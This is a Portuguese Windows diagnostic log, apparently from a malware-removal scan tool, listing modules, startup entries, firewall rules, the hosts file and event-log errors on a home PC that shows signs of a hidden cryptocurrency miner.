Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Hercílio.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
 
==================== Atalhos & WMI ========================
 
(As entradas podem ser listadas para serem restauradas ou removidas.)
 
 
ShortcutWithArgument: C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicativos do Google Chrome\Simple EPUB Reader.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ojhbgcchcbdjdenibfmjofobklkkhofc
 
==================== Módulos Carregados (Whitelisted) ==============
 
2013-12-24 13:05 - 2013-12-24 13:05 - 000466944 _____ () C:\WINDOWS\system32\DPPPlugin.dll
2017-03-18 17:58 - 2017-03-18 17:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2010-01-09 20:17 - 2010-01-09 20:17 - 004254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:40 - 2010-01-21 01:40 - 008794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2017-03-18 17:59 - 2017-03-20 01:02 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 000011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 002013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 000191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2016-12-30 20:03 - 2016-10-31 00:09 - 000670208 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\audiobg.exe
2016-12-30 20:03 - 2016-10-26 21:13 - 000045056 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\cpu_tromp_SSE2.dll
2016-12-30 20:03 - 2016-10-26 21:13 - 000247808 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\logsetuplib.dll
2016-12-30 20:03 - 2016-10-26 21:13 - 006170624 _____ () C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\cuda_tromp.dll
2017-06-27 15:10 - 2017-06-23 00:21 - 003807064 _____ () C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\libglesv2.dll
2017-06-27 15:10 - 2017-06-23 00:21 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\libegl.dll
2017-07-14 18:54 - 2017-03-28 17:08 - 000210720 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
2017-07-14 18:54 - 2017-03-28 17:08 - 000059680 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
2017-07-14 18:54 - 2017-03-28 17:08 - 000442144 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
2017-07-14 18:47 - 2016-08-18 18:43 - 000442144 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madExcept_.bpl
2017-07-14 18:47 - 2016-08-18 18:43 - 000210720 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madBasic_.bpl
2017-07-14 18:47 - 2016-08-18 18:43 - 000059680 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madDisAsm_.bpl
2017-07-14 18:47 - 2016-11-01 10:11 - 000078624 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\GetProcessDLL.dll
2017-07-14 18:54 - 2017-03-28 17:09 - 000899872 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\webres.dll
2017-07-14 18:54 - 2017-05-10 13:19 - 000631584 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\ProductStatistics.dll
2017-07-14 18:59 - 2016-12-12 16:52 - 000210720 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madBasic_.bpl
2017-07-14 18:59 - 2016-12-12 16:52 - 000059680 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madDisAsm_.bpl
2017-07-14 18:59 - 2016-12-12 16:52 - 000442144 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madExcept_.bpl
2017-07-14 19:00 - 2016-08-10 17:13 - 000899872 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\webres.dll
2017-07-14 19:00 - 2017-05-09 10:59 - 000631584 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\ProductStatistics.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
 
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
 
==================== Modo de Segurança (Whitelisted) ===================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
 
==================== Associação (Whitelisted) ===============
 
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
 
 
==================== Internet Explorer confiável/restrito ===============
 
(Se uma entrada for incluída na fixlist, será removida do Registro.)
 
IE trusted site: HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
 
==================== Hosts Conteúdo: ===============================
 
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
 
2013-08-22 10:25 - 2017-04-09 10:47 - 000000855 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
0.0.0.0 keystone.mwbsys.com
 
==================== Outras Áreas ============================
 
(Atualmente não há nenhuma correção automática para esta seção.)
 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hercílio\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\kiba-in-the-snow1.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Firewall do Windows está habilitado.
 
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
 
MSCONFIG\Services: AdaptiveSleepService => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: AndServMgr => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BthHFSrv => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: c2cautoupdatesvc => 2
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: Dell Customer Connect => 2
MSCONFIG\Services: Dell Foundation Services => 2
MSCONFIG\Services: DellDataVault => 2
MSCONFIG\Services: DellDataVaultWiz => 2
MSCONFIG\Services: DellProdRegManager => 3
MSCONFIG\Services: DellUpdate => 2
MSCONFIG\Services: Disc Soft Ultra Bus Service => 3
MSCONFIG\Services: EpsonScanSvc => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: GalaxyClientService => 3
MSCONFIG\Services: GalaxyCommunication => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: HomeNetSvc => 2
MSCONFIG\Services: IAStorDataMgrSvc => 2
MSCONFIG\Services: ibtsiva => 2
MSCONFIG\Services: ICCS => 3
MSCONFIG\Services: igfxCUIService2.0.0.0 => 2
MSCONFIG\Services: Intel® Capability Licensing Service TCP IP Interface => 3
MSCONFIG\Services: Intel® ME Service => 2
MSCONFIG\Services: IntelUSBoverIP => 2
MSCONFIG\Services: iumsvc => 3
MSCONFIG\Services: jhi_service => 2
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: MBAMScheduler => 2
MSCONFIG\Services: MBAMService => 3
MSCONFIG\Services: McAfee SiteAdvisor Service => 2
MSCONFIG\Services: McAWFwk => 3
MSCONFIG\Services: McComponentHostService => 3
MSCONFIG\Services: mccspsvc => 2
MSCONFIG\Services: McNaiAnn => 2
MSCONFIG\Services: mcpltsvc => 2
MSCONFIG\Services: RtkAudioService => 2
MSCONFIG\Services: SftService => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: SupportAssistAgent => 2
MSCONFIG\Services: SynTPEnhService => 2
MSCONFIG\Services: TrueColorALS => 2
MSCONFIG\Services: updater => 3
MSCONFIG\Services: XblAuthManager => 3
MSCONFIG\Services: XblGameSave => 3
MSCONFIG\Services: XboxNetApiSvc => 3
HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
HKLM\...\StartupApproved\Run: => "TrueColor UI"
HKLM\...\StartupApproved\Run: => "Diebold - Warsaw"
HKLM\...\StartupApproved\Run32: => "DropboxOEM"
HKLM\...\StartupApproved\Run32: => "Redirector"
HKLM\...\StartupApproved\Run32: => "ConnectionCenter"
HKLM\...\StartupApproved\Run32: => "Discord"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "DAEMON Tools Pro Agent"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000000"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000001"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "DAEMON Tools Ultra Agent"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "Free Download Manager"
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "psexe"
 
==================== Regras do Firewall (Whitelisted) ===============
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
FirewallRules: [{42C94204-6E8B-42D4-871A-50EFA70236DF}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [UDP Query User{9ADE523F-B7FD-4FCE-8DA0-F15FCD38AF77}C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe] => (Allow) C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe
FirewallRules: [TCP Query User{EE5F9A71-0A44-40DF-843B-5CC5BED31BAE}C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe] => (Allow) C:\users\hercílio\appdata\local\programs\lnv\stremio\stremio.exe
FirewallRules: [UDP Query User{AAEAE760-817F-4CEF-94A4-02E9196DDF96}C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe] => (Allow) C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe
FirewallRules: [TCP Query User{AE7D017E-D404-485F-85D7-2A8268475720}C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe] => (Allow) C:\program files (x86)\electronic arts\kingdoms of amalur - reckoning\reckoning.exe
FirewallRules: [{746A19D0-781E-46BB-BFF6-6B653018303C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B3FA0D7D-C911-453B-A8A7-40623A8B6815}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [UDP Query User{9E684EDD-D9B4-4E5F-92C0-0675A2B63C45}C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe
FirewallRules: [TCP Query User{3DE6FED7-53C4-4560-9FA8-9A54C8409F46}C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\starcraft ii\support64\sc2editor_x64.exe
FirewallRules: [UDP Query User{352AF235-CDF7-4CF3-A26B-1457BDAEF8EC}C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe
FirewallRules: [TCP Query User{C9585E03-5CE2-4904-BF63-EE9D161B6E9B}C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\diablo iii.exe
FirewallRules: [{01076931-7639-423C-9372-578B87C69463}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{6CEC797E-29E9-4F05-B966-BC6A617151F0}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe
FirewallRules: [{D097BFC7-BA20-4E34-9BCC-ADB363AD3174}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{0FCF790E-4216-4840-AAB9-3E767670C863}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{EEA120A9-E296-4E24-828A-EAF245D1D829}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{370BE90D-7684-471A-AF01-A21A2568B452}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4F7EDFCC-AB86-4095-AA4F-3A849FA96B74}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{6B2311F3-0BA7-4F7C-9911-01331C41BFF4}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{D6A44EE5-5286-4FE5-8C2C-EAE3E2BCF79A}C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe] => (Allow) C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [UDP Query User{6783B4E1-0B4B-4373-90A0-4615FF9F4EA3}C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe] => (Allow) C:\program files (x86)\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [TCP Query User{2117988C-C193-4482-B0A8-B91876BBEE23}C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe] => (Allow) C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{ACEA0377-0833-4605-B558-C3938CFCF1A3}C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe] => (Allow) C:\users\hercílio\desktop\jogos\hearthstone\hearthstone.exe
FirewallRules: [TCP Query User{DF8BF4F9-749D-4D6D-8F61-5BB7F6015473}C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe
FirewallRules: [UDP Query User{EE866013-63B8-4DD7-878E-4A0F30EE08D2}C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\diablo iii\x64\diablo iii64.exe
FirewallRules: [TCP Query User{CF850361-EB6B-45F7-88BD-BFD4081FCDC1}C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe
FirewallRules: [UDP Query User{36F10EB6-2D78-4BF3-ACEF-A8F4013FB97D}C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe] => (Allow) C:\users\hercã­lio\desktop\jogos\heroes of the storm\versions\base53548\heroesofthestorm_x64.exe
FirewallRules: [{764862B4-C5FD-4109-8C42-153531FAB18D}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromedaTrial.exe
FirewallRules: [{A50F65C6-E9F2-46AE-89D4-ED809A6FD844}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromedaTrial.exe
FirewallRules: [{BE0F5558-4953-4A2C-A426-E6CC0B3EAAA6}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromeda.exe
FirewallRules: [{28A091D8-C70E-43E8-845D-21E0EC4063DF}] => (Allow) C:\Program Files (x86)\Mass Effect Andromeda\MassEffectAndromeda.exe
FirewallRules: [TCP Query User{B9500348-932C-4FCE-A35E-05E0AE65F1B5}C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe
FirewallRules: [UDP Query User{BB4ECDFF-596F-43B4-82D1-AF0CDFFDD43B}C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cryptic studios\neverwinter\live\gameclient.exe
FirewallRules: [{25D9A896-AE02-4586-9FA4-E8166209FBDD}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4EC63264-9850-411C-9B47-9D3C2231538D}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{B435C236-7889-4D0C-BA74-40FB502455B8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{CC47023E-44E3-4A30-B0E5-3AFD3467E2E5}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [UDP Query User{396952E8-7C04-47F5-B02C-8C0C1935D2DF}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.0.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{EA0EA414-2B25-4543-85EB-4A5787CAD5AC}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{7B4C3DA7-E5D6-48D9-9562-2DD1C4A051ED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{F774E765-068C-4179-9C0F-B7D727DC6D26}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{90CE76BB-E96F-4488-AC68-4BE5975D8A69}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{592133A0-C19D-41FE-94DA-4EF2A7B0A8E5}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{8F6B0654-083F-43AD-A010-B83525AB3287}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{8ED6BACD-AC1E-4340-990A-367CF99872CC}] => (Block) LPort=445
FirewallRules: [{8592147B-B201-4FED-B6B9-C5864BDF7202}] => (Block) LPort=445
FirewallRules: [{54F82A2A-DB25-466E-8663-FE145DC48A47}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{F000EE94-3781-4402-BB3F-DE5085B0578C}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{1312B064-A57D-4132-8E7C-A1F0CB771CD6}] => (Allow) C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{2F77B83C-4045-4EF1-B934-05FB8ACFBC5C}] => (Allow) C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\FFNativeMessage.exe
FirewallRules: [TCP Query User{48977D39-4CAC-4FDC-8FB4-E85D652C8548}C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe] => (Allow) C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe
FirewallRules: [UDP Query User{94C32F5C-EA37-4EFD-915A-B25540CA8A06}C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe] => (Allow) C:\program files (x86)\might and magic heroes vii\binaries\win64\mmh7game-win64-shipping.exe
FirewallRules: [TCP Query User{E10F0748-E7DA-4EC7-9575-50B90FBFF772}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [UDP Query User{0C6D8CDD-E65C-407F-815E-C753981A83C9}C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.3.6.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{8B93DB4A-774D-4CB7-855E-FB06027E716E}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe
FirewallRules: [{7A28CB55-E271-4B80-B962-53337748A454}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe
FirewallRules: [TCP Query User{F4466481-470A-4BB5-A047-4B8DC0E9258C}C:\windows\syswow64\explorer.exe] => (Block) C:\windows\syswow64\explorer.exe
FirewallRules: [UDP Query User{56543320-A1A1-4212-B023-A8326A8D6496}C:\windows\syswow64\explorer.exe] => (Block) C:\windows\syswow64\explorer.exe
 
==================== Pontos de Restauração =========================
 
17-07-2017 02:18:39 Ponto de Verificação Agendado
25-07-2017 22:41:07 Ponto de Verificação Agendado
31-07-2017 14:46:33 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
 
==================== Dispositivos Apresentando Falhas No Gerenciador =============
 
 
==================== Erros no Log de eventos: =========================
 
Erros em Aplicativos:
==================
Error: (08/03/2017 01:08:59 PM) (Source: ESENT) (EventID: 455) (User: )
Description: SettingSyncHost (6096) {C10566E9-A1A3-4A46-8199-43185D4F84AC}: Erro -1811 (0xfffff8ed) ao abrir o arquivo de log C:\Users\Hercílio\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\edb0004F.log.
 
Error: (08/03/2017 01:03:32 PM) (Source: ESENT) (EventID: 455) (User: )
Description: taskhostw (2576) WebCacheLocal: Erro -1811 (0xfffff8ed) ao abrir o arquivo de log C:\Users\Hercílio\AppData\Local\Microsoft\Windows\WebCache\V010002D.log.
 
Error: (08/03/2017 01:03:12 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 257) (User: )
Description: Falha dos Serviços de Criptografia ao inicializar o Catálogo do Banco de Dados. Erro do ESENT:-528.
 
Error: (08/03/2017 01:03:12 PM) (Source: ESENT) (EventID: 455) (User: )
Description: Catalog Database (2372) Catalog Database: Erro -1811 (0xfffff8ed) ao abrir o arquivo de log C:\WINDOWS\system32\CatRoot2\edb00006.log.
 
Error: (08/03/2017 11:08:19 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Falha no Procedimento Open para o serviço "BITS" na DLL "C:\Windows\System32\bitsperf.dll". Os dados de desempenho para este serviço não estarão disponíveis. Os primeiros quatro bytes (DWORD) da seção de Dados contêm o código do erro.
 
Error: (08/03/2017 11:08:12 AM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação do Comprovante da Compra. 0xC004E016
Pkey Parcial=3YGVK
ACID=?
Erro Detalhado[?]
 
Error: (08/03/2017 10:58:17 AM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação do Comprovante da Compra. 0xC004E016
Pkey Parcial=3YGVK
ACID=?
Erro Detalhado[?]
 
Error: (08/03/2017 10:58:05 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ZeroConfigService.exe, versão: 19.10.0.0, carimbo de data/hora: 0x57a32942
Nome do módulo com falha: ntdll.dll, versão: 10.0.15063.447, carimbo de data/hora: 0xa329d3a8
Código de exceção: 0xc0000374
Deslocamento da falha: 0x00000000000f775f
ID do processo com falha: 0xc38
Hora de início do aplicativo com falha: 0x01d30c60708689db
Caminho do aplicativo com falha: C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
Caminho do módulo com falha: C:\WINDOWS\SYSTEM32\ntdll.dll
ID do Relatório: 710b8628-38ea-49fc-9327-617343e1fb81
Nome completo do pacote com falha: 
ID do aplicativo relativo ao pacote com falha:
 
Error: (08/03/2017 10:21:24 AM) (Source: Google Update) (EventID: 1) (User: AUTORIDADE NT)
Description: Event-ID 1
 
Error: (08/03/2017 10:20:17 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: pxese.exe, versão: 1.0.0.1, carimbo de data/hora: 0x5981dd4a
Nome do módulo com falha: unknown, versão: 0.0.0.0, carimbo de data/hora: 0x00000000
Código de exceção: 0xc0000005
Deslocamento da falha: 0x50d1c1ed
ID do processo com falha: 0x4964
Hora de início do aplicativo com falha: 0x01d30c597b16332e
Caminho do aplicativo com falha: C:\Users\Hercílio\AppData\Roaming\pxese.exe
Caminho do módulo com falha: unknown
ID do Relatório: f58fbbe6-7718-4fcb-8e11-1997eae9c6cc
Nome completo do pacote com falha: 
ID do aplicativo relativo ao pacote com falha:
 
 
Erros de Sistema:
=============
Error: (08/03/2017 02:17:47 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 e APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
 
Error: (08/03/2017 01:06:38 PM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
 
Error: (08/03/2017 01:03:30 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço Serviço de Usuário da Plataforma de Dispositivos Conectados_4a0dd terminou com o erro: 
Erro não especificado
 
Error: (08/03/2017 01:02:35 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço WsAppService.
 
Error: (08/03/2017 01:02:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Ds3Service devido ao seguinte erro: 
O serviço não respondeu à requisição de início ou controle em tempo hábil.
 
Error: (08/03/2017 01:02:33 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço Ds3Service.
 
Error: (08/03/2017 01:01:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço CldFlt devido ao seguinte erro: 
Não há suporte para o pedido.
 
Error: (08/03/2017 01:01:46 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: O desligamento do sistema que ocorreu às 12:57:09 do dia ‎03/‎08/‎2017 não era esperado.
 
Error: (08/03/2017 11:13:28 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço Service KMSELDI foi encerrado inesperadamente.  Isso aconteceu 1 vez(es).
 
Error: (08/03/2017 11:01:44 AM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
 
 
CodeIntegrity:
===================================
  Date: 2017-08-03 14:28:02.389
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-03 14:28:02.113
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
